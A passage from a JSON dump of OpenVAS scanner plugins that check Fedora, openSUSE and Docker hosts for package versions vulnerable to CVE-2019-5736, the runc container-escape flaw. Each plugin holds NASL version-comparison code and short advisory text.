remote host is missing an update for the 'lxcfs'\n package(s) announced via the FEDORA-2019-c1dac1b3b8 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"LXCFS is a simple userspace filesystem designed to work around some\ncurrent limitations of the Linux kernel.\n\nSpecifically, it', s providing two main things\n\n - A set of files which can be bind-mounted over their /proc originals\n to provide CGroup-aware values.\n\n - A cgroupfs-like tree 
which is container aware.\n\nThe code is pretty simple, written in C using libfuse.\n\nThe main driver for this work was the need to run systemd based\ncontainers as a regular unprivileged user while still allowing systemd\ninside the container to interact with cgroups.\n\nNow with the introduction of the cgroup namespace in the Linux kernel,\nthat part is no longer necessary on recent kernels and focus is now on\nmaking containers feel more like a real independent system through the\nproc masking feature.\");\n\n script_tag(name:\"affected\", value:\"'lxcfs' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"lxcfs\", rpm:\"lxcfs~3.0.4~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-05-14T00:00:00", "published": "2019-05-07T00:00:00", "id": "OPENVAS:1361412562310875706", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875706", "type": "openvas", "title": "Fedora Update for runc FEDORA-2019-bc70b381ad", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can 
redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875706\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:17:06 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for runc FEDORA-2019-bc70b381ad\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-bc70b381ad\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V6A4OSFM5GGOWW4ECELV5OHX2XRAUSPH\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'runc'\n package(s) announced via the FEDORA-2019-bc70b381ad advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is 
present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The runc command can be used to start containers which are packaged\nin accordance with the Open Container Initiative', s specifications,\nand to manage containers running under runc.\");\n\n script_tag(name:\"affected\", value:\"'runc' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"runc\", rpm:\"runc~1.0.0~92.dev.gitc1b8c57.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-10T14:49:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-09-10T00:00:00", "published": "2019-09-07T00:00:00", "id": "OPENVAS:1361412562310876762", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876762", "type": "openvas", "title": "Fedora Update for python3-lxc FEDORA-2019-2baa1f7b19", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is 
distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876762\");\n script_version(\"2019-09-10T08:05:24+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-10 08:05:24 +0000 (Tue, 10 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-07 02:24:04 +0000 (Sat, 07 Sep 2019)\");\n script_name(\"Fedora Update for python3-lxc FEDORA-2019-2baa1f7b19\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-2baa1f7b19\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T4BDBZKL32NRG5KB5JVVWTKDPNXUNGA\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python3-lxc'\n package(s) announced via the FEDORA-2019-2baa1f7b19 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Linux Resource Containers provide process and resource isolation\nwithout the overhead of full virtualization.\n\nThe python3-lxc package contains the 
Python3\nbinding for LXC.\");\n\n script_tag(name:\"affected\", value:\"'python3-lxc' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"python3-lxc\", rpm:\"python3-lxc~3.0.4~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T16:48:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2019-02-19T00:00:00", "id": "OPENVAS:1361412562310852299", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852299", "type": "openvas", "title": "openSUSE: Security Advisory for docker-runc (openSUSE-SU-2019:0201-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852299\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-02-19 04:06:06 +0100 (Tue, 19 Feb 2019)\");\n script_name(\"openSUSE: Security Advisory for docker-runc (openSUSE-SU-2019:0201-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:0201-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-02/msg00044.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'docker-runc'\n package(s) announced via the openSUSE-SU-2019:0201-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for docker-runc fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2019-5736: Effectively copying /proc/self/exe during re-exec to\n avoid write attacks to the host runc binary, which could lead to a\n container breakout (bsc#1121967)\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n Patch 
Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2019-201=1\");\n\n script_tag(name:\"affected\", value:\"docker-runc on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc\", rpm:\"docker-runc~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-debuginfo\", rpm:\"docker-runc-debuginfo~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-debugsource\", rpm:\"docker-runc-debugsource~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-kubic\", rpm:\"docker-runc-kubic~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-kubic-debuginfo\", rpm:\"docker-runc-kubic-debuginfo~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-kubic-debugsource\", rpm:\"docker-runc-kubic-debugsource~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-kubic-test\", rpm:\"docker-runc-kubic-test~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", 
rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-test\", rpm:\"docker-runc-test~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2019-02-21T00:00:00", "id": "OPENVAS:1361412562310875472", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875472", "type": "openvas", "title": "Fedora Update for runc FEDORA-2019-963ea958f9", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875472\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-02-21 04:08:23 +0100 (Thu, 21 Feb 2019)\");\n script_name(\"Fedora Update for runc FEDORA-2019-963ea958f9\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-963ea958f9\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SJZZZT46EQOOI7MJTJQW7VNJLTCGZOLU\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'runc'\n package(s) announced via the FEDORA-2019-963ea958f9 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"runc on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"runc\", rpm:\"runc~1.0.0~68.dev.git6635b4f.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-10T14:48:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-09-10T00:00:00", "published": "2019-09-07T00:00:00", "id": "OPENVAS:1361412562310876768", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876768", "type": "openvas", "title": "Fedora Update for lxcfs FEDORA-2019-2baa1f7b19", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876768\");\n script_version(\"2019-09-10T08:05:24+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-10 08:05:24 +0000 (Tue, 10 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-07 02:24:07 +0000 (Sat, 07 Sep 2019)\");\n script_name(\"Fedora Update for lxcfs FEDORA-2019-2baa1f7b19\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-2baa1f7b19\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EGZKRCKI3Y7FMADO2MENMT4TU24QGHFR\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lxcfs'\n package(s) announced via the FEDORA-2019-2baa1f7b19 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"LXCFS is a simple userspace filesystem designed to work around some\ncurrent limitations of the Linux kernel.\n\nSpecifically, it', s providing two main things\n\n - A set of files which can be bind-mounted over their /proc originals\n to provide CGroup-aware values.\n\n - A cgroupfs-like tree which is container aware.\n\nThe code 
is pretty simple, written in C using libfuse.\n\nThe main driver for this work was the need to run systemd based\ncontainers as a regular unprivileged user while still allowing systemd\ninside the container to interact with cgroups.\n\nNow with the introduction of the cgroup namespace in the Linux kernel,\nthat part is no longer necessary on recent kernels and focus is now on\nmaking containers feel more like a real independent system through the\nproc masking feature.\");\n\n script_tag(name:\"affected\", value:\"'lxcfs' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"lxcfs\", rpm:\"lxcfs~3.0.4~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "runc through 1.0-rc6, as used in Docker, allows attackers to overwrite the\nhost runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as\nroot within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an\nexisting container, to which the attacker previously had write access, that can be attached with docker exec.\nThis occurs because of file-descriptor mishandling, related to /proc/self/exe.", "modified": "2019-02-22T00:00:00", "published": "2019-02-14T00:00:00", "id": "OPENVAS:1361412562310141997", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310141997", "type": "openvas", "title": "Docker < 18.09.2 runc Command Execution Vulnerability", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = 'cpe:/a:docker:docker';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141997\");\n script_version(\"$Revision: 13828 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-22 10:35:28 +0100 (Fri, 22 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-02-14 11:54:46 +0700 (Thu, 14 Feb 2019)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2019-5736\");\n script_bugtraq_id(106976);\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Docker < 18.09.2 runc Command Execution Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n 
script_family(\"General\");\n script_dependencies(\"gb_docker_remote_detect.nasl\", \"gb_docker_service_detection_lsc.nasl\");\n script_mandatory_keys(\"docker/version\");\n\n script_tag(name:\"summary\", value:\"runc through 1.0-rc6, as used in Docker, allows attackers to overwrite the\nhost runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as\nroot within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an\nexisting container, to which the attacker previously had write access, that can be attached with docker exec.\nThis occurs because of file-descriptor mishandling, related to /proc/self/exe.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"Docker prior version 18.09.2.\");\n\n script_tag(name:\"solution\", value:\"Update to version 18.09.2 or later.\");\n\n script_xref(name:\"URL\", value:\"https://docs.docker.com/engine/release-notes/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE, nofork: TRUE))\n exit(0);\n\nif (version_is_less(version: version, test_version: \"18.09.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"18.09.2\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-05-14T00:00:00", "published": "2019-05-07T00:00:00", "id": "OPENVAS:1361412562310875806", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875806", "type": "openvas", "title": "Fedora Update for flatpak FEDORA-2019-fd9345f44a", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text 
descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875806\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:21:45 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for flatpak FEDORA-2019-fd9345f44a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-fd9345f44a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KEEWWTWPOXFOQSOBEEMYNYIRW5I3RTWB\");\n\n script_tag(name:\"summary\", 
value:\"The remote host is missing an update for the 'flatpak'\n package(s) announced via the FEDORA-2019-fd9345f44a advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"flatpak is a system for building, distributing and running sandboxed desktop\napplications on Linux.\");\n\n script_tag(name:\"affected\", value:\"'flatpak' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"flatpak\", rpm:\"flatpak~1.2.3~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-10T14:46:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-09-10T00:00:00", "published": "2019-09-07T00:00:00", "id": "OPENVAS:1361412562310876772", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876772", "type": "openvas", "title": "Fedora Update for lxc FEDORA-2019-2baa1f7b19", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are 